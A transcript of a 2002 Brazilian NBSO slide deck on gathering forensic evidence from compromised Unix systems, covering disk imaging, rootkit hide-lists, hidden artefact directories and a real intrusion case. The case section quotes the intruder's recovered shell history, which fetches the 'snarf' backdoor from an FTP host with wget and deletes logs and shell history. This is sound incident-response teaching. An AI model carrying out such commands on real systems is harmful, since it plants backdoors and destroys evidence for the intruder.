Evidências em Sistemas Unix



Documentos relacionados
Tratamento de Incidentes de Segurança na Internet Br pelo NBSO

uma rápida visão CISL 2009 João Eriberto Mota Filho Brasília, DF, 10 de novembro de 2009 Er iberto nov. 09

Lsof List Open Files. O que é o Lsof? Opções Conclusão

GNU/Linux/Bash. Aula 2

Ataques Mais Comuns na Internet BR. Tratamento e Recuperação de Incidentes

Importância dos Grupos de Resposta a Incidentes de Segurança em Computadores

Forense computacional em Linux for dummies

A linha de comando do Unix e GNU/Linux

Planeamento. Introdução ao Sistema Operativo UNIX. Java: Ferramentas, Entradas/Saídas, Excepções. Threads e Semáforos. Problemas de Sincronização

Roteiro 3: Sistemas Linux arquivos e diretórios

Backdoors x Firewalls de Aplicação Praticando em Kernel do Linux

Forense computacional em Linux for dummies. uma rápida visão introdutória

Configurando um servidor WWW seguro. Centro de Atendimento a Incidentes de Segurança - CAIS

Aula 02. Introdução ao Linux

Aula prática. Objetivo IPCONFIG. Prof. Leandro Pykosz Informa a configuração atual de rede da máquina;

Técnicas e Ferramentas Utilizadas em Análise Forense

Revisão Aula Explique a MBR(Master Boot Record)

Malwares. Algumas das diversas formas como os códigos maliciosos podem infectar ou comprometer um computador são:

O que você precisa saber sobre FTP na certificação LPI nível 1

Introdução a Administração de Sistemas GNU/Linux

SISTEMAS OPERACIONAIS LIVRES (LINUX) Professor Carlos Muniz

03/11/2011. Apresentação. SA do Linux. Sistemas de Arquivos. Curso Tecnologia em Telemática. Disciplina Administração de Sistemas Linux

Minicurso Forense Digital Paulo A. Neukamp

Aspectos de Segurança na Internet: Evolução e Tendências Atuais

II ENSL. Backdoors em Sistemas GNU/Linux: Conhecendo Para Se Proteger.

Campus - Cachoeiro Curso Técnico de Informática. Sistema de Arquivos. Prof. João Paulo de Brito Gonçalves

Configuração de um servidor FTP. Campus Cachoeiro Curso Técnico em Informática

Papel dos CSIRTs no Cenário Atual de Segurança

FICHA DE TRABALHO #08

Prof. Samuel Henrique Bucke Brito

Sistema Operacional Unidade 12 Comandos de Rede e Acesso Remoto

LABORATÓRIO 0 Revisão GNU/Linux

Instalação e configuração Linux CentOS 6.x

Apresentação, Metodologia. NBSO NIC Br Security Office

Permite o acesso remoto a um computador;

REDES DE COMPUTADORES

Software Livre. Acesso ao código fonte Alterar o código fonte Redistribuir Utilizar como desejar

Forense Computacional com Software Livre

LSOF - LiSt Open Files

Aula 01 Visão Geral do Linux

ADMINISTRAÇÃO DE REDES I LINUX. Firewall. Frederico Madeira LPIC 1, CCNA fred@madeira.eng.br

Práticas de Desenvolvimento de Software

SERVIDOR WEB + LOG DE ACESSO LABORATÓRIO DE REDES DE COMPUTADORES Responsável: Ana Luíza Cruvinel

Mini curso de GNU/Linux

Instalação de sistemas GNU/Linux em Servidores

Aula 05 Forense Computacional. Ferramentas Open Source

Introdução ao Linux: Parte I

Módulos...2 Shell...3

Minicurso Computação em Nuvem Prática: Openstack

SMaRT - Session Monitoring and Replay Tool

Linux Network Servers

CONCURSO PÚBLICO CONCURSO PÚBLICO. GRUPO MAGISTÉRIO Reservado ao CEFET-RN GRUPO MAGISTÉRIO REDES DE COMPUTADORES 14/MAIO/2006 REDES DE COMPUTADORES

Resposta a Incidentes de Segurança

Para testar se as variáveis foram carregadas, utilize o comando #export

Sistema Operacional Unidade 5 - Iniciando o modo texto. QI ESCOLAS E FACULDADES Curso Técnico em Informática

Wireshark. Captura de Protocolos da camada de aplicação. Maicon de Vargas Pereira

Sistema Operacional LINUX

Mini curso de GNU/Linux

Fundamentos de Sistemas Operacionais. GNU / Linux. Prof. Edwar Saliba Júnior Março de Unidade GNU / Linux

LISTA DE COMANDOS DO LINUX 1

O B J E T T I I V V O O S

Gerenciamento de Redes de Computadores. Pfsense Introdução e Instalação

Gerenciamento de Processos

Linux Administração. Sobre o curso. Destinatários. Redes e Sistemas - Sistemas Operativos

Parte III: Introdução ao SELinux (Secure Enhanced Linux)

Uso de Honeypots de Baixa Interatividade na Resposta a Incidentes de Segurança

PROVA DE PRÉ-REQUISITO

REVISÃO LINUX CAP /SIN PROF. ESTRELA. e) os

Como Configurar Catálogos de Correio Eletrônico com o MDaemon 6.0

comandos básicos linux.

Camada de Aplicação. Prof. Eduardo

Wireshark Lab: TCP. Versão KUROSE, J.F & ROSS, K. W. Todos os direitos reservados 2011 BATISTA, O. M. N. Tradução e adaptação para Wireshark.

Comandos.::. Aplicativos > Sistema > Acessar Console

Dados Internacionais de Catalogação na Publicação (CIP) (Câmara Brasileira do Livro, SP, Brasil)

Comandos de arquivos

Firewall. Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes. Campus Cachoeiro Curso Técnico em Informática

Projeto Honeypots Distribuídos. Antonio Montes - CenPRA/MCT Klaus Steding-Jessen NBSO/CGIbr Cristine Hoepers NBSO/CGIbr

Trabalho 3 Firewalls

PARANÁ GOVERNO DO ESTADO

Aula 03 Malware (Parte 01) Visão Geral. Prof. Paulo A. Neukamp

SISTEMAS OPERACIONAIS ABERTOS Prof. Ricardo Rodrigues Barcelar

Principais Comandos do Terminal no LINUX

Universidade Católica de Brasília Laboratório de Redes de Computadores 1 Prof Eduardo Lobo. Comandos LINUX. principais vi ifconfig.

Escola de Artes, Ciências e Humanidades Universidade de São Paulo. Tutorial de Conexão SSH (Secure Shell)

Administração de Sistemas Operacionais Não-Proprietários II

Tratamento de Incidentes. em Função de alguns Ataques Atuais na Internet-BR

Objetivos Instalação Gerência de Pacotes UNIX Shell. Curso UNIX. Matheus Braun Magrin Felipe dos Santos Silveira

Linux Networks Servers

Tecnologias Web. Lista de Exercícios AV02 Turma Luiz Leão

DISCIPLINA: Criminalística e virtualização aplicada à computação forense.

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

Tópicos. Atualizações e segurança do sistema. Manutenção Preventiva e Corretiva de Software (utilizando o MS Windows XP)

Protocolo FTP. Professor Leonardo Larback

IPTABLES. Helder Nunes

Introdução a. Shell Script. Clésio Matos

Entregar um relatório respondendo as questões propostas e principais observações feitas durante a prática (para os itens 1, 3, 4, 5, 6 e 7).

NOÇÕES DE INFORMÁTICA:

Transcrição:

Evidências em Sistemas Unix Klaus Steding-Jessen jessen@nic.br NIC BR Security Office NBSO Comitê Gestor da Internet no Brasil http://www.nbso.nic.br/ I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.1/28

Roteiro Introdução Tipos de Evidências Localização das Evidências Exemplo de Caso Real Ferramentas Úteis Referências I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.2/28

Introdução Análise de Artefatos focada em entender a invasão, ferramentas usadas, etc. Análise Forense focada em recuperar evidências I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.3/28

Objetivos Determinar Vulnerabilidade utilizada Origem Outras máquinas envolvidas Ações do invasor Motivação do invasor I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.4/28

Tipos de Evidências Voláteis memória conexões de rede, processos No sistema de arquivos arquivos de log, de configuração, etc. artefatos deixados pelo invasor No disco arquivos removidos pelo invasor I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.5/28

Linha de Ação Desconectar da rede Preservar evidências voláteis Tomar notas Relacionar horário O horário muitas vezes está incorreto Imagem do disco Para outra máquina Compressão / Criptografia I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.6/28

Preservação de Evidências Voláteis Conteúdo da Memória /dev/mem, /dev/kmem, etc processos ps, lsof, pcat, etc. Conexões de rede netstat, ifconfig, etc. LKMs carregados Swap I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.7/28

Imagens do Disco Não danifica evidências Preserva arquivos apagados Não depende da máquina comprometida ferramentas e kernel confiável Alguns problemas Tamanho da imagem em alguns sistemas Espaço em disco / tempo I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.8/28

Geração de Imagem Na máquina origem: # dd if=/dev/rsd0d nc maquina 10000 Na máquina destino: # nc -l 10000 > dd.image.sd0d # vnconfig /dev/vnd0c./dd.image.sd0d # mount -r -o noexec /dev/vnd0c /mnt/ I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.9/28

Geração de Imagem (cont.) Transferindo os dados com compressão # dd if=/dev/rsd0d gzip -c \ nc maquina 10000 Enviando os dados criptografados com ssh # dd if=/dev/rsd0d \ ssh -l user maquina cd /var/tmp ; \ dd of=dd.image I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.10/28

Evidências Comandos do Sistema Programas e bibliotecas do sistema modificados pelo invasor introdução de backdoors através de rootkits muitas vezes podem ser localizados pela modificação no ctime I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.11/28

Evidências Arquivos do Sistema Arquivos e Informações do Sistema shell history core files ssh/known_hosts comandos last e lastcomm entradas no cron arquivos de configuração * tudo abaixo de /etc/ I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.12/28

Evidências Arquivos de Log Arquivos de Logs arquivos dentro de /var/log * * geralmente editados ou removidos pelo invasor muitas vezes podem ser recuperados, se lidos diretamente do device I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.13/28

Evidências Rootkits Usados pelos invasores para evitar detecção Rootkit tradicional versões modificada de comandos * ps, netstat, ifconfig, find, etc LKM rootkit alteram estruturas do kernel difícil detecção I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.14/28

Evidências Rootkits (cont.) Arq. de configuração informam ao rootkit que informações esconder /* Processes to hide */ #define ROOTKIT_PROCESS_FILE "/dev/hda01" /* Addresses to hide */ #define ROOTKIT_ADDRESS_FILE "/dev/hda02" /* Files and directories to hide */ #define ROOTKIT_FILES_FILE "/dev/hda03" I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.15/28

Evidências Rootkits (cont.) /dev/hda01 /dev/hda02 3 sl2 3 sshdu 3 linsniffer 3 smurf 3 slice 3 mech 3 bnc 3 psybnc 1 10.231.139 1 10.154.137 1 10.254.34 3 48744 3 3666 3 31221 3 22546 3 1703 4 48744 4 2222 I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.16/28

Evidências Artefatos Artefatos: material deixado pelo Invasor ferramentas exploits material de outros sites logs de sniffer I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.17/28

Artefatos onde encontrar Arquivos regulares abaixo de /dev # find /dev -type f -ls -rwxr-xr-x 1 root root 26689 Dez 2 2000 /dev/makedev -rwx------ 1 root root 7165 Dez 9 10:59 /dev/ida/.inet/linsniffer -rw-r--r-- 1 root root 78 Dez 9 10:59 /dev/dsx -rw-r--r-- 1 root root 47 Dez 9 10:59 /dev/ptyq -rwxr-xr-- 1 root root 185 Dez 10 22:19 /dev/ttyop -rwxr-xr-x 1 root root 102 Dez 10 22:19 /dev/ttyoa -rwxr-xr-- 1 root root 152 Dez 10 22:19 /dev/ttyof I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.18/28

Artefatos onde encontrar (cont.) Diretórios começando com ponto # find / -type d -name.* -ls cat -ve drwxr-xr-x 4 root root 4096 Dez 9 12:30 /tmp/...$ drwxr-xr-x 2 root root 4096 Dez 9 09:59 /tmp/.../..\ $ drwxr-xr-x 3 named named 4096 Dez 3 00:01 /tmp/.tooz$ drwxr-xr-x 2 root root 4096 Dez 9 10:59 /dev/ida/.inet$ drwxr-xr-x 4 root root 4096 Dez 10 22:19 /usr/man/man1/.tooz$ drwxr-xr-x 5 root root 4096 Dez 6 18:12 /usr/sbin/...$ drwxr-xr-x 3 root root 4096 Dez 4 19:03 /usr/sbin/.../.mc$ drwx------ 2 root root 4096 Dez 4 19:00 /usr/sbin/.../.cedit$ I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.19/28

Artefatos onde encontrar (cont.) Conteúdo parcial de /usr/sbin/.../ -rwxr-xr-x root/root 1291 usr/sbin/.../aw/awu -rw-r--r-- root/root 231 usr/sbin/.../aw/awu.list -rw-r--r-- root/root 597 usr/sbin/.../aw/makefile -rwxr-xr-x root/root 5872 usr/sbin/.../aw/pscan2.c -rw-r--r-- root/root 6134 usr/sbin/.../aw/ss.c -rwxr-xr-x root/root 3350 usr/sbin/.../aw/ssvuln.c -rw-r----- root/root 5015 usr/sbin/.../aw/targets -rwxr-xr-x root/root 382072 usr/sbin/.../aw/wu -rwxr-xr-x root/root 1393996 usr/sbin/.../aw/x2 -rwxr-xr-x root/root 15872 usr/sbin/.../aw/pscan2 -rwxr-xr-x root/root 16580 usr/sbin/.../aw/ss -rwxr-xr-x root/root 15107 usr/sbin/.../aw/ssvuln -rw-r--r-- root/root 1604 usr/sbin/.../aw/10.105.ssh -rw-r--r-- root/root 12369 usr/sbin/.../aw/10.105.pscan.21.tmp -rw-r--r-- root/root 180 usr/sbin/.../aw/10.105.ssh.out I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.20/28

Caso Real Conexões de rede # lsof -i COMMAND PID USER TYPE NODE NAME snarf 13854 root REG 909 /tmp/snarf snarf 13854 root IPv4 TCP *:12345 (LISTEN) snarf 14447 root IPv4 TCP *:3870 (LISTEN) snarf 15210 root IPv4 TCP *:23023 (LISTEN) snarf 13854 root IPv4 TCP www:12345->10.0.183.30:3081 (CLOSE_WAIT) snarf 14447 root IPv4 TCP www:3870->10.0.183.30:3575 (CLOSE_WAIT) snarf 15210 root IPv4 TCP www:23023->10.1.120.237:34607 (CLOSE) I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.21/28

Caso Real (cont.) backdoor snarf # strings snarf /lib/ld-linux.so.2 libc.so.6 [...] SuidBack open DaemonBack open File Activated File+Pass Activated Ping Packet Activated Connect to port Activated /tmp/.nsb /tmp/.teta7374 rm -f %s lammerrlz I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.22/28

Caso Real (cont.) diretório /var/log/ foi removido # dd if=device strings egrep ˆ10.1.120.237 10.1.120.237 - - [27/Dez/2001:17:33:35-0200] \ "GET /kiddies.htm HTTP/1.0" 200 3128 10.1.120.237 - - [27/Dez/2001:17:39:26-0200] \ "GET / HTTP/1.0" 200 12608 10.1.120.237 - - [27/Dez/2001:17:39:51-0200] \ "GET / HTTP/1.0" 200 3128 I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.23/28

Caso Real (cont.) A vulnerabilidade explorada # dd if=device strings grep ˆDez Dez 27 16:39:45 www sshd[31628]: \ Did not receive ident string from 10.0.183.30. Dez 27 16:39:53 www sshd[31629]: \ Disconnecting: Corrupted check bytes on input. Dez 27 16:41:40 www sshd[31704]: \ Disconnecting: crc32 compensation attack: network attack detected Dez 27 16:41:42 www sshd[31705]: \ Disconnecting: crc32 compensation attack: network attack detected Dez 27 16:41:44 www sshd[31706]: \ Disconnecting: crc32 compensation attack: network attack detected I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.24/28

Caso Real (cont.) history do invasor whoami wget ftp://userlammer:lammer@ftp.site.de.warez/snarf ls./snarf ftp ftp.site.de.warez cp kiddies.htm index.html cd /var/log ls cd.. ls rm -rf log cd /root rm.bash_history I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.25/28

Ferramentas Úteis chkrootkit http://www.chkrootkit.org/ TCT http://www.porcupine.org/forensics/tct.html lsof ftp://ftp.sunet.se/pub/unix/admin/lsof I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.26/28

Leitura Recomendada Computer Forensic Analysis http://www.porcupine.org/forensics/ CERT/CC Steps for Recovering from a UNIX or NT System Compromise http://www.cert.org/tech_tips/root_compromise.html I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.27/28

Sites de Interesse Material desta apresentação http://www.nbso.nic.br/docs/palestras/ Documentação sobre Segurança e Administração de Redes http://www.nbso.nic.br/docs/ Documentos, RFCs e sites relacionados http://www.nbso.nic.br/links/ I Seminário Nacional de Perícia em Crimes de Informática Novembro/2002 p.28/28

2024 © DocPlayer.com.br Política de Privacidade | Termos de serviço | Feedback